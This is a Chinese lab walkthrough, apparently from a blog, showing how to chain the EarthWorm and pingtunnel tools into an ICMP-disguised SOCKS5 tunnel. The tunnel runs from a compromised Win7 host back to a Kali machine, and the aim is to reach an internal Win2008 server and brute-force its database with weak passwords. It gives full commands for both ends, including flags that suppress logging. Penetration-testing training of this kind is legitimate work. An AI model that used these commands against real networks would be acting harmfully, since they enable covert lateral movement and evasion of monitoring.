ew+pingtunnel组合建立socks5隧道

 
 
 
 
 
 
 
 
 
 
 

0x00 实验环境

攻击机:win(192.168.43.131)+kali(192.168.43.217)

受害机:win7(IP:192.168.43.50、192.168.59.133;双网卡,一个公网一个内网)、winserver2008(IP:192.168.59.18;仅主机:一个内网)

0x01 实验效果

在已经拿到公网win7服务器的前提下,通过ew与pingtunnel搭建能通往winserver2008的隧道,获取winserver2008的服务器权限

0x02 实验准备

工具:ew、pingtunnel、proxifer(代理工具)

https://github.com/idlefire/ew
https://github.com/esrrhs/pingtunnel

proxifer官网自行下载

工具介绍:

ew

EarthWorm是一款用于开启 SOCKS v5 代理服务的工具,基于标准 C 开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发。

pingtunnel

pingtunnel 是把 tcp/udp/sock5 流量伪装成 icmp 流量进行转发的工具

 

 0x03 打通隧道

1、kali执行:

./ew_for_linux64 -s rcsocks -l 10080 -e 8898

10080作为连接隧道的端口,8898作为隧道的通道,可以想象为,通向内网主机的路口为10080,走的这条路为8898。8898上所有的人(流量)都会通往10080这个路口。

2、kali执行:

./pingtunnel -type server
意思是将ew启动的sock5协议转换为icmp协议来隐藏传输

3、肉鸡win7执行:

pingtunnel.exe -type client -l 127.0.0.1:9999 -s 192.168.43.217 -t 192.168.43.217:8898 -sock5 -1 -noprint 1 -nolog 1
意思是8898这条路上的sock5流量信息隐藏为icmp类型的数据在本肉鸡的9999端口进行转发。

4、肉鸡win7执行:

ew.exe -s rssocks -d 127.0.0.1 -e 9999
在本肉鸡9999端口开启转发流量

出现上述错误时,是因为你在运行pingtunnel时没有以管理员的身份运行cmd

如下就可以显示成功了:

5、kali上出现OK字样时表示代理搭建完成:

6、使用proxifer来访问内网:

此时再次访问win2008那台仅仅为内网的主机:

7、kali通过win7搭建了隧道,实现了内网横向的证明:ping winserver2008是不通的,但是挂好代理可以进行59.18的数据库弱口令爆破!

原文地址:https://www.cnblogs.com/cute-puli/p/15213394.html